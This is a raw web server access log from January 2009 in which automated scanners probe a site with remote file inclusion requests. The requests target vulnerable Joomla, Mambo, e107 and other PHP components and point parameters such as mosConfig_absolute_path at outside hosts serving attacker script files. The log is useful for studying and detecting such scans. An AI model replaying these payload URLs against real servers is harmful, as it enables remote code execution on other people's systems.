211.202.2.220 - - [06/Jan/2009:05:53:42 -0800] "GET /logs/access_081002.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:54:13 -0800] "GET /php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:54:13 -0800] "GET /logs/php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:54:13 -0800] "GET /logs/access_081206.log/php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:54:17 -0800] "GET /logs/access_081002.log%20%20/joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:54:17 -0800] "GET /logs/access_081208.log/php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:54:22 -0800] "GET /logs/access_081208.log%20/home.php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:54:22 -0800] "GET /home.php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:54:22 -0800] "GET /logs/home.php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:05:54:50 -0800] "GET /logs/access_080930.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:05:54:50 -0800] "GET /logs/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:05:54:50 -0800] "GET /e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:55:58 -0800] "GET /logs/access_081206.log/home.php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:05:56:00 -0800] "GET /logs/access_081208.log/home.php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:56:59 -0800] "GET /logs/access_080930.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:57:01 -0800] "GET /logs/access_081006.log/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:06:00:57 -0800] "GET /logs/access_081208.log%20/php?index=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:57:16 -0800] "GET /logs/access_080930.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
119.235.18.7 - - [06/Jan/2009:05:59:40 -0800] "GET /logs/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.thepointers.net"
119.235.18.7 - - [06/Jan/2009:05:59:40 -0800] "GET /e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.thepointers.net"
119.235.18.7 - - [06/Jan/2009:05:59:40 -0800] "GET /logs/access_081222.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.thepointers.net"
208.98.1.107 - - [06/Jan/2009:06:00:40 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
208.98.1.107 - - [06/Jan/2009:06:00:40 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
208.98.1.107 - - [06/Jan/2009:06:00:41 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
208.98.1.107 - - [06/Jan/2009:06:01:10 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
208.98.1.107 - - [06/Jan/2009:06:01:10 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
208.98.1.107 - - [06/Jan/2009:06:01:11 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "thepointers.net"
222.236.47.182 - - [06/Jan/2009:06:01:39 -0800] "GET /logs/access_080927.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:06:02:06 -0800] "GET /logs/access_081222.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:06:02:56 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:06:04:01 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:06:04:01 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:06:04:01 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:04:04 -0800] "GET /logs/access_081206.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:04:05 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:04:05 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:04:07 -0800] "GET /logs/access_081206.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:04:07 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:04:08 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
89.218.85.18 - - [06/Jan/2009:06:05:32 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.luzaclub.ru/phorum/includes/tg/n1igsindabr0nx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
89.218.85.18 - - [06/Jan/2009:06:05:32 -0800] "GET /logs/access_081206.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.luzaclub.ru/phorum/includes/tg/n1igsindabr0nx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
89.218.85.18 - - [06/Jan/2009:06:05:32 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.luzaclub.ru/phorum/includes/tg/n1igsindabr0nx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
89.218.85.18 - - [06/Jan/2009:06:06:19 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.luzaclub.ru/phorum/includes/tg/n1igsindabr0nx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:06:06:19 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.luzaclub.ru/phorum/includes/tg/n1igsindabr0nx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
89.218.85.18 - - [06/Jan/2009:06:06:19 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.luzaclub.ru/phorum/includes/tg/n1igsindabr0nx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
119.235.18.7 - - [06/Jan/2009:06:07:01 -0800] "GET /logs/access.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:06:08:07 -0800] "GET /logs/access.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:08:47 -0800] "GET /logs/access_081208.log//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:08:47 -0800] "GET /logs//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:08:47 -0800] "GET /index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:08:57 -0800] "GET /logs/access_081208.log//index1.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:08:58 -0800] "GET /logs//index1.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:08:58 -0800] "GET /index1.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:09:02 -0800] "GET /logs/access_081206.log//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:09:13 -0800] "GET /logs/access_081206.log//index1.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:09:20 -0800] "GET /logs/access_081208.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:09:20 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:09:20 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:09:42 -0800] "GET /logs/access_081206.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:09:58 -0800] "GET /logs/access_081208.log%20//index1.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:10:00 -0800] "GET /logs/access_081208.log%20//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.35.82.155 - - [06/Jan/2009:06:11:32 -0800] "GET /logs/access_081208.log%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:14:15 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:14:15 -0800] "GET /logs/access_081206.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:14:15 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:06:14:15 -0800] "GET /logs/access_081206.log/index.php?redir=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:06:14:15 -0800] "GET /logs/index.php?redir=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:06:14:15 -0800] "GET /index.php?redir=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
216.40.204.130 - - [06/Jan/2009:06:14:16 -0800] "GET /logs/access_081208.log/index.php?redir=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:14:56 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:14:56 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:14:56 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "thepointers.net"
218.234.23.56 - - [06/Jan/2009:06:15:01 -0800] "GET /logs/access_081206.log//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.thepointers.net"
218.234.23.56 - - [06/Jan/2009:06:15:01 -0800] "GET /logs//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.thepointers.net"
218.234.23.56 - - [06/Jan/2009:06:15:01 -0800] "GET /galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.thepointers.net"
218.234.23.56 - - [06/Jan/2009:06:15:05 -0800] "GET /logs/access_081208.log//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:15:17 -0800] "GET /logs/access_081208.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
148.245.102.115 - - [06/Jan/2009:06:15:25 -0800] "GET /logs/access_081206.log//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.thepointers.net"
148.245.102.115 - - [06/Jan/2009:06:15:25 -0800] "GET /galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.thepointers.net"
148.245.102.115 - - [06/Jan/2009:06:15:26 -0800] "GET /logs//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.thepointers.net"
148.245.102.115 - - [06/Jan/2009:06:15:32 -0800] "GET /galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.thepointers.net"
148.245.102.115 - - [06/Jan/2009:06:15:32 -0800] "GET /logs/access_081206.log//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.thepointers.net"
148.245.102.115 - - [06/Jan/2009:06:15:32 -0800] "GET /logs//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.thepointers.net"
148.245.102.115 - - [06/Jan/2009:06:15:38 -0800] "GET /logs/access_081208.log//galeria.php?start=0&kategoria=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:06:15:50 -0800] "GET /logs/access_081208.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:18:39 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.amadazzle.com/FPChat/chat/localization/spanish/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:18:39 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.amadazzle.com/FPChat/chat/localization/spanish/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
94.23.10.29 - - [06/Jan/2009:06:18:44 -0800] "GET /logs//?custompluginfile[]=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
94.23.10.29 - - [06/Jan/2009:06:18:44 -0800] "GET /?custompluginfile[]=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:19:00 -0800] "GET /logs/access_080930.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:20:06 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.amadazzle.com/FPChat/chat/localization/spanish/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:20:06 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.amadazzle.com/FPChat/chat/localization/spanish/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:20:08 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:20:08 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:06:20:08 -0800] "GET /logs/access_081206.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
89.36.165.22 - - [06/Jan/2009:06:21:31 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:06:21:31 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:06:21:31 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.149.209.64 - - [06/Jan/2009:06:21:57 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
